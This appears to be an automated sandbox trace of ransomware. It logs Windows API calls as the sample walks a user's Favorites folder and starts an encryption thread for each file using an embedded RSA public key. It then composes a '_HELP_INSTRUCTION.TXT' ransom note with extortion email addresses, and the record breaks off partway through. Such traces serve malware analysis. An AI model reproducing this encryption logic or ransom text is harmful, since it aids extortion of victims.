PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0046.411] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0046.411] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0046.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.411] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.411] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0046.412] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0046.412] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0046.412] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0046.412] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0046.412] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0046.412] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0046.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0046.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0046.412] SetErrorMode (uMode=0x1) returned 0x1 [0046.412] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0046.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.412] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0046.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3e27d78 [0046.425] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0046.425] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0046.425] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.425] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.425] lstrcmpW (lpString1="MSN Autos.url", lpString2="..") returned 1 [0046.425] lstrcmpW (lpString1="MSN Autos.url", lpString2=".") returned 1 [0046.425] StrStrW (lpFirst="MSN Autos.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0046.425] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntldr") returned 0x0 [0046.425] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTLDR") returned 0x0 [0046.425] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTDETECT.COM") returned 0x0 [0046.425] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntdetect.com") returned 0x0 [0046.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0046.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0046.425] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0046.425] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.425] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0046.425] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.425] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x55c [0046.425] Sleep (dwMilliseconds=0x96) [0046.582] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.582] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="..") returned 1 [0046.582] lstrcmpW (lpString1="MSN Entertainment.url", lpString2=".") returned 1 [0046.582] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0046.582] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntldr") returned 0x0 [0046.582] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTLDR") returned 0x0 [0046.582] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTDETECT.COM") returned 0x0 [0046.582] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntdetect.com") returned 0x0 [0046.582] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0046.582] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0046.582] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0046.582] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.582] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0046.582] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x574 [0046.582] Sleep (dwMilliseconds=0x96) [0046.747] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.747] lstrcmpW (lpString1="MSN Money.url", lpString2="..") returned 1 [0046.747] lstrcmpW (lpString1="MSN Money.url", lpString2=".") returned 1 [0046.748] StrStrW (lpFirst="MSN Money.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0046.748] StrStrW (lpFirst="MSN Money.url", lpSrch="ntldr") returned 0x0 [0046.748] StrStrW (lpFirst="MSN Money.url", lpSrch="NTLDR") returned 0x0 [0046.748] StrStrW (lpFirst="MSN Money.url", lpSrch="NTDETECT.COM") returned 0x0 [0046.748] StrStrW (lpFirst="MSN Money.url", lpSrch="ntdetect.com") returned 0x0 [0046.748] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0046.748] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0046.748] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0046.748] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.748] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0046.748] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x580 [0046.748] Sleep (dwMilliseconds=0x96) [0046.893] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.893] lstrcmpW (lpString1="MSN Sports.url", lpString2="..") returned 1 [0046.893] lstrcmpW (lpString1="MSN Sports.url", lpString2=".") returned 1 [0046.893] StrStrW (lpFirst="MSN Sports.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0046.893] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntldr") returned 0x0 [0046.893] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTLDR") returned 0x0 [0046.893] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTDETECT.COM") returned 0x0 [0046.893] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntdetect.com") returned 0x0 [0046.893] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0046.893] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0046.893] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0046.893] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.893] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0046.893] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x57c [0046.893] WaitForSingleObject (hHandle=0x57c, dwMilliseconds=0xffffffff) returned 0x0 [0047.051] Sleep (dwMilliseconds=0x96) [0047.204] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.204] lstrcmpW (lpString1="MSN.url", lpString2="..") returned 1 [0047.204] lstrcmpW (lpString1="MSN.url", lpString2=".") returned 1 [0047.204] StrStrW (lpFirst="MSN.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0047.204] StrStrW (lpFirst="MSN.url", lpSrch="ntldr") returned 0x0 [0047.204] StrStrW (lpFirst="MSN.url", lpSrch="NTLDR") returned 0x0 [0047.204] StrStrW (lpFirst="MSN.url", lpSrch="NTDETECT.COM") returned 0x0 [0047.205] StrStrW (lpFirst="MSN.url", lpSrch="ntdetect.com") returned 0x0 [0047.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0047.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0047.205] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0047.205] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.205] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0047.205] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0047.205] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x56c [0047.205] Sleep (dwMilliseconds=0x96) [0047.392] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.392] lstrcmpW (lpString1="MSNBC News.url", lpString2="..") returned 1 [0047.392] lstrcmpW (lpString1="MSNBC News.url", lpString2=".") returned 1 [0047.392] StrStrW (lpFirst="MSNBC News.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0047.392] StrStrW (lpFirst="MSNBC News.url", lpSrch="ntldr") returned 0x0 [0047.392] StrStrW (lpFirst="MSNBC News.url", lpSrch="NTLDR") returned 0x0 [0047.392] StrStrW (lpFirst="MSNBC News.url", lpSrch="NTDETECT.COM") returned 0x0 [0047.392] StrStrW (lpFirst="MSNBC News.url", lpSrch="ntdetect.com") returned 0x0 [0047.392] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0047.392] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0047.392] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0047.392] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.392] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0047.392] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0047.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x584 [0047.393] Sleep (dwMilliseconds=0x96) [0047.550] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0047.550] FindClose (in: hFindFile=0x3e27d78 | out: hFindFile=0x3e27d78) returned 1 [0047.550] FindClose (in: hFindFile=0x3e27d78 | out: hFindFile=0x3e27d78) returned 0 [0047.550] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0047.550] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0047.551] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0047.551] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0047.551] SetErrorMode (uMode=0x1) returned 0x1 [0047.551] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT") returned 74 [0047.551] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0047.551] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0047.552] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x578) returned 0x0 [0047.552] RegQueryValueExW (in: hKey=0x578, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de3ec8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3de3ec8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0047.552] RegCloseKey (hKey=0x578) returned 0x0 [0047.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0047.552] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your 